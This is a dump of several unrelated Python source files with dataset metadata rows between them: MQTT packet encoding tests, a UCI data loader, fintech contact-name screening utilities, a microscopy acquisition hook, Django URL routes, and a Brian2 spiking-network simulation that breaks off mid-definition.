False,
u'foo'.encode('utf-8'),
packet_id=256
)
expect = binascii.unhexlify(
b'3a0b0004746573740100666f6f'
)
assert publish == expect
def test_publish_dup_requires_qos():
"""
Setting dup on PUBLISH requires nonzero QoS.
"""
with pytest.raises(ValueError):
mqttpacket.publish(
u'test',
True,
0,
False,
u'foo'.encode('utf-8'),
packet_id=256
)
def test_publish_payload_requires_bytes():
"""
PUBLISH payload must be bytes.
"""
with pytest.raises(TypeError):
mqttpacket.publish(
u'test',
False,
0,
False,
u'foo'
)
def test_pingreq():
"""A PINGREQ is properly encoded."""
ping = mqttpacket.pingreq()
assert ping == b'\xc0\x00'
def test_unsubscribe():
"""
An unsubscribe of two topics is successfully built.
"""
msg = mqttpacket.unsubscribe(257, [u'a/b', u'c/d'])
assert msg[:1] == b'\xa1'
assert six.indexbytes(msg, 1) == 12
assert msg[2:4] == b'\x01\x01'
assert msg[4:6] == b'\x00\x03'
assert msg[6:9] == u'a/b'.encode('utf-8')
assert msg[9:11] == b'\x00\x03'
assert msg[11:] == u'c/d'.encode('utf-8')
def test_unsubscribe_requires_one():
"""
At least one topic must be provided to unsubscribe.
"""
with pytest.raises(ValueError):
mqttpacket.unsubscribe(123, [])
| 24.606061 | 77 | 0.604475 |
import binascii
import json
import six
import pytest
import mqttpacket.v311 as mqttpacket
def test_connect_basic():
expect = binascii.unhexlify(
b'101000044d5154540402003c000474657374'
)
packet = mqttpacket.connect(u'test')
assert packet == expect
assert isinstance(packet, bytes)
assert len(packet) == 18
assert six.indexbytes(packet, 0) == 16
assert six.indexbytes(packet, 9) == 0x02
assert packet[14:].decode('utf-8') == u'test'
def test_will_requirements():
with pytest.raises(ValueError):
mqttpacket.ConnectSpec(
will_topic=u'foo',
)
with pytest.raises(ValueError):
mqttpacket.ConnectSpec(
will_message=u'my message',
)
def test_valid_will():
cs = mqttpacket.ConnectSpec(
will_topic=u'my_will_topic',
will_message=u'my_will_message',
will_qos=1,
)
wt = u'my_will_topic'
wm = u'my_will_message'
assert cs.will_topic == wt
assert cs.will_message == wm
assert cs.flags() == 0x0e
assert len(cs.payload()) == 32
cs = mqttpacket.ConnectSpec(
will_topic=u'wt2',
will_message=u'wm2',
will_qos=2,
)
assert cs.will_topic == u'wt2'
assert cs.will_message == u'wm2'
assert cs.flags() == 0x16
def test_default_spec():
cs = mqttpacket.ConnectSpec()
assert not cs.payload()
assert cs.flags() == 0x02
def test_will_must_be_unicode():
with pytest.raises(TypeError):
mqttpacket.ConnectSpec(
will_topic=b'foo',
will_message=u'bar'
)
with pytest.raises(TypeError):
mqttpacket.ConnectSpec(
will_topic=u'biz',
will_message=b'baz'
)
def test_will_qos_values():
with pytest.raises(ValueError):
mqttpacket.ConnectSpec(
will_topic=u'biz',
will_message=u'baz',
will_qos=3
)
mqttpacket.ConnectSpec(
will_topic=u'my_will_topic',
will_message=u'my_will_message',
will_qos=1
)
mqttpacket.ConnectSpec(
will_topic=u'my_will_topic',
will_message=u'my_will_message',
will_qos=2
)
def test_connect_with_spec():
cs = mqttpacket.ConnectSpec(
will_topic=u'my_will_topic',
will_message=u'my_will_message',
will_qos=1,
)
packet = mqttpacket.connect(u'test', connect_spec=cs)
assert isinstance(packet, bytes)
assert len(packet) == 50
assert six.indexbytes(packet, 0) == 16
assert six.indexbytes(packet, 9) == 0x0e
assert packet[14:18].decode('utf-8') == u'test'
def test_build_subscription_multiple():
specs = [
mqttpacket.SubscriptionSpec(u'a/b', 0x01),
mqttpacket.SubscriptionSpec(u'c/d', 0x02),
]
packet = mqttpacket.subscribe(10, specs)
assert isinstance(packet, bytes)
assert six.indexbytes(packet, 0) == 0x82
assert six.indexbytes(packet, 1) == 14
assert six.indexbytes(packet, 2) << 8 | six.indexbytes(packet, 3) == 10
assert six.indexbytes(packet, 4) << 8 | six.indexbytes(packet, 5) == 3
assert packet[6:9].decode('utf-8') == u'a/b'
assert six.indexbytes(packet, 9) == 0x01
assert six.indexbytes(packet, 10) << 8 | six.indexbytes(packet, 11) == 3
assert packet[12:15].decode('utf-8') == u'c/d'
assert six.indexbytes(packet, 15) == 0x02
def test_build_subscription_single():
specs = [
mqttpacket.SubscriptionSpec(u'test/1', 0x00),
]
packet = mqttpacket.subscribe(10, specs)
assert isinstance(packet, bytes)
assert six.indexbytes(packet, 0) == 0x82
assert six.indexbytes(packet, 1) == 11
assert six.indexbytes(packet, 2) << 8 | six.indexbytes(packet, 3) == 10
assert six.indexbytes(packet, 4) << 8 | six.indexbytes(packet, 5) == 6
assert packet[6:12].decode('utf-8') == u'test/1'
assert six.indexbytes(packet, 12) == 0x00
def test_subscription_spec_multibyte():
topic = u'super€'
spec = mqttpacket.SubscriptionSpec(
topic,
0
)
assert spec.remaining_len() == 11
assert spec.to_bytes() == b'\x00\x08\x73\x75\x70\x65\x72\xe2\x82\xac\x00'
def test_encode_single_byte_length():
r = mqttpacket.encode_remainining_length(127)
assert r == b'\x7f'
r = mqttpacket.encode_remainining_length(0)
assert r == b'\x00'
def test_encode_two_byte_length():
r = mqttpacket.encode_remainining_length(128)
assert r == b'\x80\x01'
r = mqttpacket.encode_remainining_length(16383)
assert r == b'\xff\x7f'
def test_encode_three_byte_length():
r = mqttpacket.encode_remainining_length(16384)
assert r == b'\x80\x80\x01'
r = mqttpacket.encode_remainining_length(2097151)
assert r == b'\xff\xff\x7f'
def test_encode_four_byte_length():
r = mqttpacket.encode_remainining_length(2097152)
assert r == b'\x80\x80\x80\x01'
r = mqttpacket.encode_remainining_length(268435455)
assert r == b'\xff\xff\xff\x7f'
def test_disconnect():
assert mqttpacket.disconnect() == b'\xe0\x00'
def test_publish():
payload = {u'test': u'test'}
payload_str = json.dumps(payload).encode('utf-8')
publish = mqttpacket.publish(
u'test',
False,
0,
True,
payload_str
)
print(binascii.hexlify(publish))
assert six.indexbytes(publish, 0) == 49
assert six.indexbytes(publish, 1) == 22
expect = binascii.unhexlify(
b'31160004746573747b2274657374223a202274657374227d'
)
assert publish == expect
def test_publish_nonzero_qos_requires_packetid():
with pytest.raises(ValueError):
mqttpacket.publish(
u'test',
False,
1,
True,
u'foo'.encode('utf-8')
)
with pytest.raises(ValueError):
mqttpacket.publish(
u'test',
False,
2,
True,
u'foo'.encode('utf-8')
)
def test_publish_qos_1():
publish = mqttpacket.publish(
u'test',
False,
1,
True,
u'foo'.encode('utf-8'),
packet_id=255
)
expect = binascii.unhexlify(
b'330b00047465737400ff666f6f'
)
assert publish == expect
def test_publish_qos_2():
publish = mqttpacket.publish(
u'test',
False,
2,
False,
u'foo'.encode('utf-8'),
packet_id=256
)
expect = binascii.unhexlify(
b'340b0004746573740100666f6f'
)
assert publish == expect
def test_publish_dup():
publish = mqttpacket.publish(
u'test',
True,
1,
False,
u'foo'.encode('utf-8'),
packet_id=256
)
expect = binascii.unhexlify(
b'3a0b0004746573740100666f6f'
)
assert publish == expect
def test_publish_dup_requires_qos():
with pytest.raises(ValueError):
mqttpacket.publish(
u'test',
True,
0,
False,
u'foo'.encode('utf-8'),
packet_id=256
)
def test_publish_payload_requires_bytes():
with pytest.raises(TypeError):
mqttpacket.publish(
u'test',
False,
0,
False,
u'foo'
)
def test_pingreq():
ping = mqttpacket.pingreq()
assert ping == b'\xc0\x00'
def test_unsubscribe():
msg = mqttpacket.unsubscribe(257, [u'a/b', u'c/d'])
assert msg[:1] == b'\xa1'
assert six.indexbytes(msg, 1) == 12
assert msg[2:4] == b'\x01\x01'
assert msg[4:6] == b'\x00\x03'
assert msg[6:9] == u'a/b'.encode('utf-8')
assert msg[9:11] == b'\x00\x03'
assert msg[11:] == u'c/d'.encode('utf-8')
def test_unsubscribe_requires_one():
with pytest.raises(ValueError):
mqttpacket.unsubscribe(123, [])
| true | true |
1c304b2e446caeea09fe4f3238f2f4808c2013b4 | 1,980 | py | Python | src/bnn_priors/bnn_priors/data/UCI/uci.py | activatedgeek/uncertainty-da-bayesian-classification | a270fb095f4790dea15327145897d09d0ba9c80b | [
"Apache-2.0"
] | 31 | 2021-02-16T09:35:03.000Z | 2022-03-31T17:18:54.000Z | src/bnn_priors/bnn_priors/data/UCI/uci.py | activatedgeek/understanding-bayesian-classification | a270fb095f4790dea15327145897d09d0ba9c80b | [
"Apache-2.0"
] | 1 | 2021-05-10T15:25:48.000Z | 2021-05-10T15:25:48.000Z | src/bnn_priors/bnn_priors/data/UCI/uci.py | activatedgeek/understanding-bayesian-classification | a270fb095f4790dea15327145897d09d0ba9c80b | [
"Apache-2.0"
] | 4 | 2021-02-21T03:38:00.000Z | 2021-12-24T15:13:29.000Z | import os
import torch as t
import numpy as np
from torch.utils.data import TensorDataset
from bnn_priors.data import Dataset
__all__ = ('UCI',)
class UCI:
"""
The usage is:
```
uci = UCIDataset("protein", 3)
```
e.g. normalized training dataset:
```
uci.norm.train
```
"""
def __init__(self, dataset, split, dtype='float32', device="cpu"):
_ROOT = os.path.abspath(os.path.dirname(__file__))
dataset_dir = f'{_ROOT}/{dataset}/'
data = np.loadtxt(f'{dataset_dir}/data.txt').astype(getattr(np, dtype))
index_features = np.loadtxt(f'{dataset_dir}/index_features.txt')
index_target = np.loadtxt(f'{dataset_dir}/index_target.txt')
X_unnorm = t.from_numpy(data[:, index_features.astype(int)])
y_unnorm = t.from_numpy(data[:, index_target.astype(int):index_target.astype(int)+1])
# split into train and test
index_train = np.loadtxt(f'{dataset_dir}/index_train_{split}.txt').astype(int)
index_test = np.loadtxt(f'{dataset_dir}/index_test_{split}.txt').astype(int)
# record unnormalized dataset
self.unnorm = Dataset(X_unnorm, y_unnorm, index_train, index_test, device)
# compute normalization constants based on training set
self.X_std = t.std(self.unnorm.train_X, 0)
self.X_std[self.X_std == 0] = 1. # ensure we don't divide by zero
self.X_mean = t.mean(self.unnorm.train_X, 0)
self.y_mean = t.mean(self.unnorm.train_y)
self.y_std = t.std(self.unnorm.train_y)
X_norm = (self.unnorm.X - self.X_mean)/self.X_std
y_norm = (self.unnorm.y - self.y_mean)/self.y_std
self.norm = Dataset(X_norm, y_norm, index_train, index_test, device)
self.num_train_set = self.unnorm.X.shape[0]
self.in_shape = self.unnorm.X.shape[1:]
self.out_shape = self.unnorm.y.shape[1:]
def denormalize_y(self, y):
return self.y_std * y + self.y_mean
| 33 | 93 | 0.644949 | import os
import torch as t
import numpy as np
from torch.utils.data import TensorDataset
from bnn_priors.data import Dataset
__all__ = ('UCI',)
class UCI:
def __init__(self, dataset, split, dtype='float32', device="cpu"):
_ROOT = os.path.abspath(os.path.dirname(__file__))
dataset_dir = f'{_ROOT}/{dataset}/'
data = np.loadtxt(f'{dataset_dir}/data.txt').astype(getattr(np, dtype))
index_features = np.loadtxt(f'{dataset_dir}/index_features.txt')
index_target = np.loadtxt(f'{dataset_dir}/index_target.txt')
X_unnorm = t.from_numpy(data[:, index_features.astype(int)])
y_unnorm = t.from_numpy(data[:, index_target.astype(int):index_target.astype(int)+1])
index_train = np.loadtxt(f'{dataset_dir}/index_train_{split}.txt').astype(int)
index_test = np.loadtxt(f'{dataset_dir}/index_test_{split}.txt').astype(int)
self.unnorm = Dataset(X_unnorm, y_unnorm, index_train, index_test, device)
self.X_std = t.std(self.unnorm.train_X, 0)
self.X_std[self.X_std == 0] = 1.
self.X_mean = t.mean(self.unnorm.train_X, 0)
self.y_mean = t.mean(self.unnorm.train_y)
self.y_std = t.std(self.unnorm.train_y)
X_norm = (self.unnorm.X - self.X_mean)/self.X_std
y_norm = (self.unnorm.y - self.y_mean)/self.y_std
self.norm = Dataset(X_norm, y_norm, index_train, index_test, device)
self.num_train_set = self.unnorm.X.shape[0]
self.in_shape = self.unnorm.X.shape[1:]
self.out_shape = self.unnorm.y.shape[1:]
def denormalize_y(self, y):
return self.y_std * y + self.y_mean
| true | true |
1c304cfde2e518bcc04299a8cd1038af217984de | 3,939 | py | Python | python_data/fintech/basic_utils.py | younhapan/ystdoc | a3fee3c48fc4e35b26b70ab7d9f123be059a4a7a | [
"Apache-2.0"
] | null | null | null | python_data/fintech/basic_utils.py | younhapan/ystdoc | a3fee3c48fc4e35b26b70ab7d9f123be059a4a7a | [
"Apache-2.0"
] | null | null | null | python_data/fintech/basic_utils.py | younhapan/ystdoc | a3fee3c48fc4e35b26b70ab7d9f123be059a4a7a | [
"Apache-2.0"
] | null | null | null | # https://github.com/orgs/tmrwh/teams/fintech/repositories
# anubis_application_service anubis_decision_service anubis_result_service anubis_status_service: 这四个是决策引擎和业务系统交互附属包
# ice_core: 决策引擎
# feature_lib: 特征计算逻辑库
# feature_bank: 离线刷特征工具
# tethys: 数据获取特征框架
# themis: 特征计算调度框架
# lambda_core: 对外请求数据接口整合
# amon: 离线模型训练工具
# maat: 在线模型加载工具
# daixiaomi_common: 公共服务,打印日志,消费队列,异常获取
# miracle: 监控,数据分析工具
# 主要看ice_core feature_lib amon maat miracle
#!/usr/bin/env python
# encoding: utf-8
import sys
import os
import traceback
import socket
import time
import urllib
import json
import datetime
import re
def get_good_contacts(contacts):
""" 通讯录数据优化,剔除杂质:
1、去掉数字姓名
2、去掉短号码
3、去掉有8个以上号码的联系人
"""
num_map = {}
good_contacts = []
for c in contacts:
if c.name.isdigit():
continue
if len(c.phone) <= 6:
continue
if c.name in num_map:
num_map[c.name].append(c)
else:
num_map[c.name] = [c]
for k,v in num_map.items():
if len(v) >= 8:
continue
else:
good_contacts.append(v)
good_list = []
for i in good_contacts:
for j in i:
good_list.append(j)
return good_list
def pos_in_name(name):
"""判断名name内是否出现了POS或POSS(但不包括possibility等单词)"""
name = name.replace(' ','')
name = name.decode('utf8')
# 匹配所有中文字符
pat = u"[\u4e00-\u9fa5]{1}"
# 把所有中文换成空格
tmp = re.sub(pat,' ',name)
# 删除开头结尾空格,并将多个连续空格变为一个
words = ' '.join(tmp.split())
if words == '':
return False
words = words.split(' ')
for w in words:
if w.upper() == 'POS' or w.upper()=='POSS' or w.upper()=='POSJI':
return True
return False
def has_number(name):
"""判断名name内是否出现了数字(包括中文的数字)"""
if bool(re.search(r'\d',name)):
return True
num_str = ['一','二','三','四','五','六','七','八','九','十']
for s in num_str:
if s in name:
return True
return False
def name_is_tonghang(name0, suspicious_name_list):
"""判断称呼name0是否命中同行名"""
# 转码
try:
name = name0.encode('utf8')
except:
name = name0
# 处理同时带数字和'借'、'贷'可疑词的情况
if has_number(name):
for sus_name in suspicious_name_list['tonghang']['name_with_number']:
if sus_name in name:
return True, '数字+'+sus_name
# 处理pos或pos机的情况
if pos_in_name(name):
return True, 'POS或POSS'
for sus in suspicious_name_list['tonghang']['name']:
if isinstance(sus,str):
# 处理可疑词仅是一个单词的情况
if sus in name:
return True, sus
elif isinstance(sus,list):
# 处理可疑词是多个词的情况
flag = 0
for s in sus:
if s in name:
flag += 1
if flag == len(sus):
return True, '+'.join(sus)
return False, '称呼'+name+'未命中同行名'
def name_is_suspicious(name0, suspicious_name_list):
"""判断称呼name0是否是可疑的"""
# 转码
try:
name = name0.encode('utf8')
except:
name = name0
levels = [level for level in suspicious_name_list.keys() if isinstance(level,int)]
levels.sort()
for level in levels:
for sus in suspicious_name_list[level]['name']:
if isinstance(sus,str):
# 处理可疑词仅是一个单词的情况
if sus in name:
return True, level, sus
elif isinstance(sus,list):
# 处理可疑词是多个词的情况
flag = 0
for s in sus:
if s in name:
flag += 1
if flag == len(sus):
return True, level, '+'.join(sus)
# 带数字的情况
if has_number(name):
for sus_name in suspicious_name_list[level]['name_with_number']:
if sus_name in name:
return True, level, '数字+'+sus_name
return False, -1, '称呼'+name+'未命中同行名' | 27.354167 | 116 | 0.562325 |
import sys
import os
import traceback
import socket
import time
import urllib
import json
import datetime
import re
def get_good_contacts(contacts):
num_map = {}
good_contacts = []
for c in contacts:
if c.name.isdigit():
continue
if len(c.phone) <= 6:
continue
if c.name in num_map:
num_map[c.name].append(c)
else:
num_map[c.name] = [c]
for k,v in num_map.items():
if len(v) >= 8:
continue
else:
good_contacts.append(v)
good_list = []
for i in good_contacts:
for j in i:
good_list.append(j)
return good_list
def pos_in_name(name):
name = name.replace(' ','')
name = name.decode('utf8')
pat = u"[\u4e00-\u9fa5]{1}"
tmp = re.sub(pat,' ',name)
words = ' '.join(tmp.split())
if words == '':
return False
words = words.split(' ')
for w in words:
if w.upper() == 'POS' or w.upper()=='POSS' or w.upper()=='POSJI':
return True
return False
def has_number(name):
if bool(re.search(r'\d',name)):
return True
num_str = ['一','二','三','四','五','六','七','八','九','十']
for s in num_str:
if s in name:
return True
return False
def name_is_tonghang(name0, suspicious_name_list):
try:
name = name0.encode('utf8')
except:
name = name0
if has_number(name):
for sus_name in suspicious_name_list['tonghang']['name_with_number']:
if sus_name in name:
return True, '数字+'+sus_name
if pos_in_name(name):
return True, 'POS或POSS'
for sus in suspicious_name_list['tonghang']['name']:
if isinstance(sus,str):
if sus in name:
return True, sus
elif isinstance(sus,list):
flag = 0
for s in sus:
if s in name:
flag += 1
if flag == len(sus):
return True, '+'.join(sus)
return False, '称呼'+name+'未命中同行名'
def name_is_suspicious(name0, suspicious_name_list):
try:
name = name0.encode('utf8')
except:
name = name0
levels = [level for level in suspicious_name_list.keys() if isinstance(level,int)]
levels.sort()
for level in levels:
for sus in suspicious_name_list[level]['name']:
if isinstance(sus,str):
if sus in name:
return True, level, sus
elif isinstance(sus,list):
flag = 0
for s in sus:
if s in name:
flag += 1
if flag == len(sus):
return True, level, '+'.join(sus)
if has_number(name):
for sus_name in suspicious_name_list[level]['name_with_number']:
if sus_name in name:
return True, level, '数字+'+sus_name
return False, -1, '称呼'+name+'未命中同行名' | true | true |
1c304eca5d99b8ec648c996cba5a70c52485321d | 285 | py | Python | test/magellan_focus_surface.py | ilyasdc/pycro-manager | 5f0153e8a90104eb8715348c6eb22c4d8fdee477 | [
"BSD-3-Clause"
] | 88 | 2020-05-08T16:54:24.000Z | 2022-03-09T01:03:04.000Z | test/magellan_focus_surface.py | ilyasdc/pycro-manager | 5f0153e8a90104eb8715348c6eb22c4d8fdee477 | [
"BSD-3-Clause"
] | 200 | 2020-05-15T13:21:44.000Z | 2022-03-31T17:55:23.000Z | test/magellan_focus_surface.py | ilyasdc/pycro-manager | 5f0153e8a90104eb8715348c6eb22c4d8fdee477 | [
"BSD-3-Clause"
] | 31 | 2020-04-30T03:22:50.000Z | 2022-03-19T18:00:32.000Z | from pycromanager import Bridge, Acquisition
import numpy as np
def hook_fn(event):
coordinates = np.array([event["x"], event["y"], event["z"]])
return event
# magellan example
acq = Acquisition(magellan_acq_index=0, post_hardware_hook_fn=hook_fn)
acq.await_completion()
| 19 | 70 | 0.740351 | from pycromanager import Bridge, Acquisition
import numpy as np
def hook_fn(event):
coordinates = np.array([event["x"], event["y"], event["z"]])
return event
acq = Acquisition(magellan_acq_index=0, post_hardware_hook_fn=hook_fn)
acq.await_completion()
| true | true |
1c304f0ffe61e37c164dc36801f09525d665b7ab | 588 | py | Python | site/gnss_iot/urls.py | paulohenriquerosa/gnss-iot-server | 6e7ff39bc83276d6ad86121083eb48d134d00f9d | [
"MIT"
] | null | null | null | site/gnss_iot/urls.py | paulohenriquerosa/gnss-iot-server | 6e7ff39bc83276d6ad86121083eb48d134d00f9d | [
"MIT"
] | null | null | null | site/gnss_iot/urls.py | paulohenriquerosa/gnss-iot-server | 6e7ff39bc83276d6ad86121083eb48d134d00f9d | [
"MIT"
] | null | null | null |
from django.urls import path
from . import views
urlpatterns = [
path('', views.index, name='index'),
path('profile/<int:user_id>/', views.profile, name='profile'),
path('profile/devices/', views.devices, name='devices'),
path('profile/new_device/', views.new_device, name='new_device'),
path('profile/delete_device/<int:device_id>/', views.delete_device, name='delete_device'),
path('profile/edit_device/<int:device_id>/', views.edit_device, name='edit_device'),
path('profile/detail_device/<int:device_id>/', views.detail_device, name='detail_device'),
]
| 39.2 | 94 | 0.705782 |
from django.urls import path
from . import views
urlpatterns = [
path('', views.index, name='index'),
path('profile/<int:user_id>/', views.profile, name='profile'),
path('profile/devices/', views.devices, name='devices'),
path('profile/new_device/', views.new_device, name='new_device'),
path('profile/delete_device/<int:device_id>/', views.delete_device, name='delete_device'),
path('profile/edit_device/<int:device_id>/', views.edit_device, name='edit_device'),
path('profile/detail_device/<int:device_id>/', views.detail_device, name='detail_device'),
]
| true | true |
1c304f488108df86cc25e7b49439df93f5c38397 | 51,772 | py | Python | retrain.py | Math-568-project/interneuron_circuits_plasticity | ded04f8da5d315d2ec18950179efa41ed4813960 | [
"MIT"
] | null | null | null | retrain.py | Math-568-project/interneuron_circuits_plasticity | ded04f8da5d315d2ec18950179efa41ed4813960 | [
"MIT"
] | null | null | null | retrain.py | Math-568-project/interneuron_circuits_plasticity | ded04f8da5d315d2ec18950179efa41ed4813960 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
import numpy as np
import pickle
from brian2 import *
from brian2tools import *
from analyse_experiment import *
from plot_Spikingmodel import *
from utils import *
RESULTS_DIR = './results'
TUNED_ORI = 1
def run_network(params):
# get parameters
p = Struct(**params)
# simulation
total_simtime = p.nonplasticwarmup_simtime + p.warmup_simtime + p.reward_simtime + p.noreward_simtime + p.noSSTPV_simtime + p.after_simtime
total_warmup_simtime = p.nonplasticwarmup_simtime + p.warmup_simtime
stim_time = p.stim_time
input_time = p.input_time
seed(p.seed)
# neurons
N4 = p.N4
L4_rate = p.L4_rate
gl = p.gl
el = p.el
er = p.er
vt = p.vt
memc = p.memc
tau_gaba = p.tau_gaba
tau_ampa = p.tau_ampa
tau = p.tau_noise
sigma = p.sigma
# connections
w_PYR_PV = p.w_PYR_PV
w_PYR_VIP = p.w_PYR_VIP
w_PYR_SOM = p.w_PYR_SOM
w_FFPYR = p.w_FFPYR
w_FFPV = p.w_FFPV
w_FFSOM = p.w_FFSOM
w_TDVIP = p.w_TDVIP
w_L4PYR = p.w_L4PYR
c_gap = p.c_gap
tau_spikelet = p.tau_spikelet
# plasticity
tau_stdp = p.tau_stdp
tau_istdp = p.tau_istdp
relbound = p.relbound
gmax_SSTPV = p.gmax_SSTPV
dApre = p.dApre * nS
dApost = -dApre * tau_stdp / tau_stdp * 1.05
dApre_i = p.dApre_i * nS
dApost_i = -dApre_i * tau_istdp / tau_istdp * 1.05
# untuned Layer 4 neurons:
eqs_FF = '''
rate = L4_rate: Hz
'''
FF = NeuronGroup(1,
eqs_FF,
threshold='rand() < rate*dt',
method='euler',
name='FF')
# tuned Layer 4 neurons:*((t<(stim_end_time+10*ms)))
eqs_layer4 = '''
rate = clip(cos(orientation*2 - selectivity*2), 0, inf)*L4_rate : Hz
stim_rate = rate*int(t<stim_end_time): Hz
gap_rate = (L4_rate*2/5)*int(t>=stim_end_time) : Hz
selectivity : 1 # preferred orientation
orientation : 1 (shared) # orientation of the current stimulus
stim_start_time : second (shared) # start time of the current stimulus
stim_end_time : second (shared) # end time of the current stimulus
'''
layer4 = NeuronGroup(N4,
eqs_layer4,
threshold='rand() < stim_rate *dt',
method='euler',
name='layer4')
gapfiller = NeuronGroup(N4,
'''gap_rate : Hz (linked)''',
threshold='rand() < gap_rate *dt',
method='euler',
name='gapfiller')
gapfiller.gap_rate = linked_var(layer4, 'gap_rate')
# selectivities for N4 = 4 neurons: 0, 45, 90, and 135 degrees in radians
# for each L4 neuron, selectivity between 0 and pi
layer4.selectivity = '(i%N4)/(1.0*N4)*pi'
# Choose one of the four preferred oriented bars every 70ms (discrete stimulus)
# idx = int(floor(rand()*N4)) for N4=4 samples uniformly from [0,1,2,3]
# orientation = (idx%4)/(1.0*4)*pi
runner_code = '''
orientation = ((int(floor(rand()*N4)))%4)/(1.0*4)*pi
stim_start_time = t
stim_end_time = t + stim_time
'''
layer4.run_regularly(runner_code, dt=p.input_time, when='start')
# L23 neurons
eqs_neurons = '''
dv/dt=(-gl*(v-el)+Isyn+Igap+Ispikelet)/memc + sigma * (2 / tau)**.5 *xi: volt (unless refractory)
Isyn = IsynE + IsynI : amp
IsynE = -g_ampa*v : amp
IsynI = -g_gaba*(v-er) : amp
Igap: amp
dIspikelet/dt = -Ispikelet/tau_spikelet : amp
dg_ampa/dt = -g_ampa/tau_ampa : siemens
dg_gaba/dt = -g_gaba/tau_gaba : siemens
'''
# Excitatory synapses
STDP_E = '''
w : siemens
gmax : siemens
dApre/dt = -Apre / tau_stdp : siemens (event-driven)
dApost/dt = -Apost / tau_stdp : siemens (event-driven)
plastic : boolean (shared)
'''
# STDP at excitatory synapses
on_pre_STDP_E = '''g_ampa += w
Apre += dApre
w = clip(w + plastic*Apost, 0*nS, gmax)'''
on_post_STDP_E = '''Apost += dApost
w = clip(w + plastic*Apre, 0*nS, gmax)'''
# anti-Hebbian STDP at excitatory synapses
on_pre_antiHebb_IE = '''g_ampa += w
Apre += dApre
w = clip(w - plastic*Apost, 0*nS, gmax)'''
on_post_antiHebb_IE = '''Apost += dApost
w = clip(w - plastic*Apre, 0*nS, gmax)'''
# define neurons
exc_neurons = NeuronGroup(p.NPYR,
model=eqs_neurons,
threshold='v > vt',
reset='v=el',
refractory=2 * ms,
method='euler')
inh_neurons = NeuronGroup(p.NSOM + p.NVIP + p.NPV,
model=eqs_neurons,
threshold='v > vt',
reset='v=el',
refractory=2 * ms,
method='euler')
PYR = exc_neurons[:p.NPYR]
SOM = inh_neurons[:p.NSOM]
VIP = inh_neurons[p.NSOM:int(p.NSOM + p.NVIP)]
PV = inh_neurons[int(p.NSOM + p.NVIP):]
# Feedforward synaptic connections from L4 to L23
feedforward1 = Synapses(layer4[0:1],
PYR[0:100],
'''w = w_L4PYR: siemens''',
on_pre='g_ampa += w',
name='feedforward1')
feedforward1.connect(p=1)
feedforward2 = Synapses(layer4[1:2],
PYR[100:200],
on_pre='g_ampa += w_L4PYR',
name='feedforward2')
feedforward2.connect(p=1)
feedforward3 = Synapses(layer4[2:3],
PYR[200:300],
on_pre='g_ampa += w_L4PYR',
name='feedforward3')
feedforward3.connect(p=1)
feedforward4 = Synapses(layer4[3:4],
PYR[300:400],
on_pre='g_ampa += w_L4PYR',
name='feedforward4')
feedforward4.connect(p=1)
feedforwardgap1 = Synapses(gapfiller[0:1],
PYR[0:100],
on_pre='g_ampa += w_L4PYR',
name='feedforwardgap1')
feedforwardgap1.connect(p=1)
feedforwardgap2 = Synapses(gapfiller[1:2],
PYR[100:200],
on_pre='g_ampa += w_L4PYR',
name='feedforwardgap2')
feedforwardgap2.connect(p=1)
feedforwardgap3 = Synapses(gapfiller[2:3],
PYR[200:300],
on_pre='g_ampa += w_L4PYR',
name='feedforwardgap3')
feedforwardgap3.connect(p=1)
feedforwardgap4 = Synapses(gapfiller[3:4],
PYR[300:400],
on_pre='g_ampa += w_L4PYR',
name='feedforwardgap4')
feedforwardgap4.connect(p=1)
feedforward_unspec = Synapses(FF,
PYR,
on_pre='g_ampa += w_FFPYR',
name='feedforward_unspec')
feedforward_unspec.connect(p=1)
feedforward_PV = Synapses(FF,
PV,
on_pre='g_ampa += w_FFPV',
name='feedforward_PV')
feedforward_PV.connect(p=1)
feedforward_i1 = Synapses(layer4[0:1],
SOM[0:30],
on_pre='g_ampa += w_FFSOM',
name='feedforward_i1')
feedforward_i1.connect(p=1)
feedforward_i2 = Synapses(layer4[1:2],
SOM[30:60],
on_pre='g_ampa += w_FFSOM',
name='feedforward_i2')
feedforward_i2.connect(p=1)
feedforward_i3 = Synapses(layer4[2:3],
SOM[60:90],
on_pre='g_ampa += w_FFSOM',
name='feedforward_i3')
feedforward_i3.connect(p=1)
feedforward_i4 = Synapses(layer4[3:4],
SOM[90:120],
on_pre='g_ampa += w_FFSOM',
name='feedforward_i4')
feedforward_i4.connect(p=1)
feedforward_gap1 = Synapses(gapfiller[0:1],
SOM[0:30],
on_pre='g_ampa += w_FFSOM*1.1',
name='feedforward_gapi1')
feedforward_gap1.connect(p=1)
feedforward_gap2 = Synapses(gapfiller[1:2],
SOM[30:60],
on_pre='g_ampa += w_FFSOM*1.1',
name='feedforward_gapi2')
feedforward_gap2.connect(p=1)
feedforward_gap3 = Synapses(gapfiller[2:3],
SOM[60:90],
on_pre='g_ampa += w_FFSOM*1.1',
name='feedforward_gapi3')
feedforward_gap3.connect(p=1)
feedforward_gap4 = Synapses(gapfiller[3:4],
SOM[90:120],
on_pre='g_ampa += w_FFSOM*1.1',
name='feedforward_gapi4')
feedforward_gap4.connect(p=1)
# Synaptic connections within L23
# Connections from PCs to SSTs:
on_pre_PCSOM = on_pre_antiHebb_IE
on_post_PCSOM = on_post_antiHebb_IE
PYR_SOM1 = Synapses(PYR[0:100],
SOM[0:30],
STDP_E,
on_pre=on_pre_PCSOM,
on_post=on_post_PCSOM,
name='PYR_SOM1')
PYR_SOM1.connect(p=p.p_PYR_SOM)
PYR_SOM1.w = w_PYR_SOM
PYR_SOM1.gmax = w_PYR_SOM + relbound * nS
PYR_SOM2 = Synapses(PYR[100:200],
SOM[30:60],
STDP_E,
on_pre=on_pre_PCSOM,
on_post=on_post_PCSOM,
name='PYR_SOM2')
PYR_SOM2.connect(p=p.p_PYR_SOM)
PYR_SOM2.w = w_PYR_SOM
PYR_SOM2.gmax = w_PYR_SOM + relbound * nS
PYR_SOM3 = Synapses(PYR[200:300],
SOM[60:90],
STDP_E,
on_pre=on_pre_PCSOM,
on_post=on_post_PCSOM,
name='PYR_SOM3')
PYR_SOM3.connect(p=p.p_PYR_SOM)
PYR_SOM3.w = w_PYR_SOM
PYR_SOM3.gmax = w_PYR_SOM + relbound * nS
PYR_SOM4 = Synapses(PYR[300:400],
SOM[90:120],
STDP_E,
on_pre=on_pre_PCSOM,
on_post=on_post_PCSOM,
name='PYR_SOM4')
PYR_SOM4.connect(p=p.p_PYR_SOM)
PYR_SOM4.w = w_PYR_SOM
PYR_SOM4.gmax = w_PYR_SOM + relbound * nS
# Inhibitory synapses
